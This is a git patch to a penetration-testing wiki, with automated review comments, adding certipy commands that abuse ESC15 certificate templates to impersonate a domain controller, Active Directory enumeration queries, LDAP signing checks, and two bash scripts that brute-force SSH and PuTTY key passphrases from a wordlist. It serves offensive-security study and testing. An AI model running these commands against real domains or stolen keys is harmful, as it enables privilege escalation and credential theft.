From d62fadcee1d872f0f5bc463f1afa7b623fb86172 Mon Sep 17 00:00:00 2001
From: Sam Freeside
Date: Wed, 30 Oct 2024 23:03:35 +0300
Subject: [PATCH] [AHK] Automatic update :alien:
---
SUMMARY.md | 1 +
.../infrastructure/ad/ad-cs-abuse/esc15.md | 8 +--
.../infrastructure/ad/lateral-movement/rdp.md | 6 ++
pentest/infrastructure/ad/ldap-ldaps.md | 12 +++-
pentest/perimeter/ssh.md | 61 +++++++++++++++++++
redteam/maldev/winapi.md | 1 +
6 files changed, 82 insertions(+), 7 deletions(-)
diff --git a/SUMMARY.md b/SUMMARY.md
index 6ffd770..778cc77 100644
--- a/SUMMARY.md
+++ b/SUMMARY.md
@@ -17,6 +17,7 @@
 - [ESC1](pentest/infrastructure/ad/ad-cs-abuse/esc1.md)
 - [ESC4](pentest/infrastructure/ad/ad-cs-abuse/esc4.md)
 - [ESC8](pentest/infrastructure/ad/ad-cs-abuse/esc8.md)
+ - [ESC15](pentest/infrastructure/ad/ad-cs-abuse/esc15.md)
 - [Golden Certificate](pentest/infrastructure/ad/ad-cs-abuse/golden-certificate.md)
 * [ADIDNS Abuse](pentest/infrastructure/ad/adidns-abuse.md)
 * [Attack Trusts](pentest/infrastructure/ad/attack-trusts.md)
diff --git a/pentest/infrastructure/ad/ad-cs-abuse/esc15.md b/pentest/infrastructure/ad/ad-cs-abuse/esc15.md
index fe7f37a..53bb6af 100644
--- a/pentest/infrastructure/ad/ad-cs-abuse/esc15.md
+++ b/pentest/infrastructure/ad/ad-cs-abuse/esc15.md
@@ -13,13 +13,13 @@ description: Inject Application Policies into Version 1 Certificate Templates
 Get enabled templates:
-```
+```powershell
 PS > $enabledTemplates = Get-ADObject -LDAPFilter "(&(objectClass=pKIEnrollmentService))" -SearchBase "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,$((Get-ADRootDSE).rootDomainNamingContext)" -Properties certificateTemplates | select -ExpandProperty certificateTemplates
 ```
 Get v1 templates with `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` that are enabled:
-```
+```powershell
 PS > Get-ADObject -Filter 'objectClass -eq "pKICertificateTemplate"' -SearchBase "CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,$((Get-ADRootDSE).rootDomainNamingContext)" -Property name,msPKI-Template-Schema-Version,msPKI-Certificate-Name-Flag | ? {$_.'msPKI-Template-Schema-Version' -eq 1 -and ($_.'msPKI-Certificate-Name-Flag' -band 0x00000001)} | ? {$enabledTemplates -contains $_.name}
 ```
@@ -34,7 +34,7 @@ PS > Get-ADObject -Filter 'objectClass -eq "pKICertificateTemplate"' -SearchBase
 Abusing **Client Authentication**:
-```
+```bash
 $ proxychains4 certipy req -u snovvcrash@megacorp.local -p 'Passw0rd!' -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template VulnTemplate --application-policies '1.3.6.1.5.5.7.3.2' -upn 'DC01$@megacorp.local' -sid -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp
 ```
@@ -44,7 +44,7 @@ $ proxychains4 certipy req -u snovvcrash@megacorp.local -p 'Passw0rd!' -ca CorpC
 Abusing **Certificate Request Agent**:
-```
+```bash
 $ proxychains4 certipy req -u snovvcrash@megacorp.local -p 'Passw0rd!' -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template VulnTemplate --application-policies '1.3.6.1.4.1.311.20.2.1' -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp
 $ proxychains4 certipy req -u snovvcrash@megacorp.local -p 'Passw0rd!' -pfx snovvcrash.pfx -ca CorpCA -target CA01.megacorp.local -target-ip 192.168.1.12 -template User -on-behalf-of 'MEGACORP\DC01$' -ns 192.168.1.11 -dc-ip 192.168.1.11 -dns-tcp
 ```
diff --git a/pentest/infrastructure/ad/lateral-movement/rdp.md b/pentest/infrastructure/ad/lateral-movement/rdp.md
index 73a32ab..231f115 100644
--- a/pentest/infrastructure/ad/lateral-movement/rdp.md
+++ b/pentest/infrastructure/ad/lateral-movement/rdp.md
@@ -7,6 +7,12 @@ description: Remote Desktop Protocol
 * [https://syfuhs.net/how-authentication-works-when-you-use-remote-desktop](https://syfuhs.net/how-authentication-works-when-you-use-remote-desktop)
 * [https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3](https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3)
+Look for terminal servers in a domain:
+
+```powershell
+PS > Get-ADComputer -LDAPFilter "(&(objectClass=computer)(memberOf=CN=Terminal Server License Servers,CN=Builtin,$((Get-ADRootDSE).rootDomainNamingContext)))" | select dNSHostName
+```
+
diff --git a/pentest/infrastructure/ad/ldap-ldaps.md b/pentest/infrastructure/ad/ldap-ldaps.md
index b289c0b..adaffc1 100644
--- a/pentest/infrastructure/ad/ldap-ldaps.md
+++ b/pentest/infrastructure/ad/ldap-ldaps.md
@@ -12,6 +12,12 @@ description: Lightweight Directory Access Protocol
 ![LDAP Authentication Protocols (Almond)](/.gitbook/assets/012.png)
+Check if LDAPS was ever correctly configured:
+
+```
+$ openssl s_client -host 192.168.1.11 -port 636
+```
+
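Review bot: In the rdp.md hunk, the new LDAP filter selects computers that are members of the builtin `Terminal Server License Servers` group, which as far as I know is populated by RDS licensing servers rather than by the session hosts users actually RDP into, so the lead-in `Look for terminal servers in a domain:` may overstate what the query returns. Consider rewording it to `Look for RDS license servers in a domain:` or adding a one-line note that these are licensing servers, which only hint at where terminal servers live.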
@@ -91,7 +97,7 @@ Function DecodeUserAccountControl ([int]$UAC)
 - [https://github.com/zyn3rgy/LdapRelayScan](https://github.com/zyn3rgy/LdapRelayScan)
-Scan for LDAP Singing and LDAP Channel Binding:
+Scan for LDAP Singing and LDAPS Channel Binding:
 ```
 $ python3 LdapRelayScan.py -method BOTH -dc-ip 192.168.1.11 -u snovvcrash -p 'Passw0rd!'
@@ -101,7 +107,7 @@ $ for dc in `cat discover/hosts/dc_ip.txt`; do cme ldap $dc -u snovvcrash -p 'Pa
-### LDAP Signing & LDAP Channel Binding
+### LDAP Signing & LDAPS Channel Binding
 - [https://offsec.almond.consulting/bypassing-ldap-channel-binding-with-starttls.html](https://offsec.almond.consulting/bypassing-ldap-channel-binding-with-starttls.html)
@@ -116,7 +122,7 @@ If `LdapServerIntegrity` is set to `2`, LDAP Signing is required:
 PS > Get-ItemProperty "HKLM:\System\CurrentControlSet\Services\NTDS\Parameters\" -Name LdapServerIntegrity
 ```
-If `LdapEnforceChannelBinding` is set to `2`, LDAP Channel Binding is **always** required:
+If `LdapEnforceChannelBinding` is set to `2`, LDAPS Channel Binding is **always** required:
 ```
 PS > Get-ItemProperty "HKLM:\System\CurrentControlSet\Services\NTDS\Parameters\" -Name LdapEnforceChannelBinding
diff --git a/pentest/perimeter/ssh.md b/pentest/perimeter/ssh.md
index e197fd0..4d8e16a 100644
--- a/pentest/perimeter/ssh.md
+++ b/pentest/perimeter/ssh.md
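Review bot: The rewritten line `+Scan for LDAP Singing and LDAPS Channel Binding:` in the first ldap-ldaps.md hunk still carries the typo `Singing`; since the commit already edits this line, it should read `Scan for LDAP Signing and LDAPS Channel Binding:`. The heading changed in the next hunk, `### LDAP Signing & LDAPS Channel Binding`, spells it correctly, so the page is currently inconsistent with itself.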
@@ -59,6 +59,67 @@ $ nmap -p 22 --script ssh-publickey-acceptance --script-args "ssh.usernames={'ro
+## Quicky Offline Private Key Crack
+
+- [https://security.stackexchange.com/a/191122](https://security.stackexchange.com/a/191122)
+
+{% tabs %}
+{% tab title="PEM/OpenSSH" %}
+{% code title="pem-crack.sh" %}
+```bash
+#!/usr/bin/env bash
+
+echo "Wordlist : $1"
+echo "PEM key : $2"
+echo "New PEM key : $3"
+cp "$2" "$3" && chmod 600 "$3"
+
+while read -r line
+do
+ err=$( (ssh-keygen -p -P "$line" -N '' -f "$3") 2>&1 )
+
+ if [[ ! $err = *"incorrect passphrase"* ]]; then
+ echo "Passphrase : $line"
+ echo "$err"
+ break
+ fi
+done < "$1"
+```
+{% endcode %}
+{% endtab %}
+{% tab title="PuTTY PPK" %}
+{% code title="ppk-crack.sh" %}
+```bash
+#!/usr/bin/env bash
+# sudo apt install putty-tools -y
+
+echo "Wordlist : $1"
+echo "PEM key : $2"
+echo "New PEM key : $3"
+
+touch /tmp/empty
+while read -r line
+do
+ echo "$line" > /tmp/w
+ err=$( (puttygen "$2" -P -o "$3" --old-passphrase /tmp/w --new-passphrase /tmp/empty) 2>&1 )
+
+ if [[ ! $err = *"wrong passphrase"* ]]; then
+ echo "Passphrase : $line"
+ echo "$err"
+ puttygen "$3" -O private-openssh -o "$3"
+ break
+ fi
+done < $1
+
+rm -f /tmp/w /tmp/empty
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
+
+
+
 ## Enum Users
 **CVE-2018-15473**
diff --git a/redteam/maldev/winapi.md b/redteam/maldev/winapi.md
index 0386921..df42f21 100644
--- a/redteam/maldev/winapi.md
+++ b/redteam/maldev/winapi.md
@@ -13,3 +13,4 @@
 ## Tools
 - [https://github.com/MalwareApiLib/MalwareApiLibrary](https://github.com/MalwareApiLib/MalwareApiLibrary)
+- [https://www.leeholmes.com/managing-ini-files-with-powershell/](https://www.leeholmes.com/managing-ini-files-with-powershell/)
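Review bot: In `pem-crack.sh` the success test `if [[ ! $err = *"incorrect passphrase"* ]]; then` treats any other failure (unreadable key file, `ssh-keygen` not installed, malformed key) as a hit, so the very first wordlist entry would be printed as the passphrase; branching on the exit status instead, `if ssh-keygen -p -P "$line" -N '' -f "$3" >/dev/null 2>&1; then`, avoids the false positive, and the `puttygen` test in `ppk-crack.sh` has the same weakness. The PPK script also writes every candidate to the fixed paths `/tmp/w` and `/tmp/empty`, which under a normal umask are readable by other local users and silently reuse whatever already exists at those names; `tmpdir=$(mktemp -d) || exit 1` followed by `trap 'rm -rf -- "$tmpdir"' EXIT`, with the files placed under `"$tmpdir"`, keeps them private and makes the trailing `rm -f` unnecessary. Its `done < $1` is unquoted while the PEM script uses `done < "$1"`, and both loops should read with `while IFS= read -r line` so candidates with leading or trailing whitespace are tried verbatim. Finally, the PPK script's prompts say `PEM key` although its inputs are a PuTTY `.ppk` file.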